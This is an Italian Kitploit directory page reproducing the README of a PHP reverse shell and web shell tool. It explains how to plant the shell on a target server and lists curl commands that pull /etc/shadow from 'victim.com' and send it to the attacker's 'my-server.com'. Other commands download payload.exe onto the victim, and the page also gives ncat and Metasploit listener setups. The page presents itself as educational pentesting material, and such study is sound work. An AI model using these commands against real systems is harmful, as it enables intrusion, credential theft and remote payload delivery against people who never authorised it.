Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
php-reverse-shell — Shell PHP che funzionano su sistemi operativi Linux, macOS e Windows. | Kitploit
Strumenti/GitHubGitHub/ivan-sincek/php-reverse-shell
ExploitSfruttamento di Applicazioni WebPost-ExploitPenetration TestingApprendimento e FormazioneRed TeamingStrumento di Accesso Remoto
GitHubivan-sincek/php-reverse-shell

php-reverse-shell

Shell PHP che funzionano su sistemi operativi Linux, macOS e Windows.

Vedi Repository
5711605 mesi faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

PHP Reverse Shell

Solo una piccola rivisitazione del popolare script PHP reverse shell pentestmonkey/php-reverse-shell. Crediti all'autore originale!

Funziona su sistemi operativi Linux e macOS con /bin/sh e su sistemi operativi Windows con cmd.exe. Lo script rileverà automaticamente il sistema operativo sottostante.

Funziona sia con ncat che con multi/handler.

Testato su:

  • XAMPP per Linux v7.3.19 con PHP v7.3.19 su Kali Linux v2020.2 (64-bit),
  • XAMPP per OS X v7.4.10 con PHP v7.4.10 su macOS Catalina v10.15.6 (64-bit),
  • XAMPP per Windows v7.4.3 con PHP v7.4.3 su Windows 10 Enterprise OS (64-bit),
  • Immagine Docker nouphet/docker-php4 con PHP v4.4.0,
  • Immagine Docker steeze/php52-nginx con PHP v5.2.17.

Le pipe di processo su sistemi operativi Windows non supportano operazioni asincrone, quindi stream_set_blocking(), stream_select() e feof() non funzioneranno correttamente, ma ho trovato una soluzione alternativa.

Realizzato a scopo educativo. Spero che possa essere d'aiuto!

Indice dei contenuti

  • Reverse Shell
  • Web Shell
  • Script di Upload/Download di File
    • Caso 1: Caricare lo Script sul Server della Vittima
    • Caso 2: Caricare lo Script sul Tuo Server
  • Configurare un Listener
  • Immagini

Reverse Shell

/src/reverse/php_reverse_shell.php richiede PHP v5.0.0 o superiore.

/src/reverse/php_reverse_shell_older.php richiede PHP v4.3.0 o superiore.

Modifica l'indirizzo IP e il numero di porta all'interno degli script come necessario.

Copia /src/reverse/php_reverse_shell.php nella directory radice web del tuo server (ad es. in /opt/lampp/htdocs/ su XAMPP) o caricalo sul web server del tuo target.

Naviga fino al file con il tuo browser web preferito.

Web Shell

Dai un'occhiata alla semplice web shell PHP basata su richiesta HTTP POST.

Dai un'occhiata alla semplice web shell PHP basata su richiesta HTTP GET. Devi codificare l'URL dei tuoi comandi.

Dai un'occhiata alla semplice web shell PHP v2 basata su richiesta HTTP GET. Devi codificare l'URL dei tuoi comandi.

Script di Upload/Download di File

Dai un'occhiata al semplice script PHP di upload/download di file basato su richiesta HTTP POST per l'upload di file e richiesta HTTP GET per il download di file.

Quando scarichi un file, devi codificare l'URL del percorso del file.

A seconda della configurazione del server, il download di un file tramite parametro di richiesta HTTP GET potrebbe non funzionare sempre; in tal caso, dovrai hardcodare il percorso del file nello script.

Caso 1: Caricare lo Script sul Server della Vittima

Naviga fino allo script sul web server della vittima con il tuo browser web preferito, oppure usa cURL dal tuo PC.

Carica un file nella directory radice web del server dal tuo PC:

root@kitploit:~
curl -skL -X POST https://victim.com/files.php -F file=@/root/payload.exe

Scarica un file dal server sul tuo PC:

root@kitploit:~
curl -skL -X GET https://victim.com/files.php?file=/etc/shadow -o shadow

Se hai elevato i tuoi privilegi iniziali all'interno della tua reverse shell, questo script potrebbe non avere gli stessi privilegi della shell. In tal caso, per scaricare un determinato file, potresti dover copiare il file nella directory radice web e impostare i permessi di lettura necessari.

Caso 2: Caricare lo Script sul Tuo Server

Dalla tua reverse shell PHP, esegui i seguenti comandi cURL.

Carica un file dal PC della vittima alla directory radice web del tuo server:

root@kitploit:~
curl -skL -X POST https://my-server.com/files.php -F file=@/etc/shadow

Scarica un file dalla directory radice web del tuo server sul PC della vittima:

root@kitploit:~
curl -skL -X GET https://my-server.com/files.php?file=/root/payload.exe -o payload.exe

curl -skL -X GET https://my-server.com/payload.exe -o payload.exe

Configurare un Listener

Per configurare un listener, apri la tua console preferita su Kali Linux ed esegui uno degli esempi qui sotto.

Configura il listener ncat:

root@kitploit:~
ncat -nvlp 9000

Configura il listener multi/handler:

root@kitploit:~
msfconsole -q

use exploit/multi/handler

set PAYLOAD windows/shell_reverse_tcp

set LHOST 192.168.8.185

set LPORT 9000

exploit

Immagini

Ncat

Figura 1 - Ncat

Dump dello script

Figura 2 - Dump dello script

Scarica lo strumento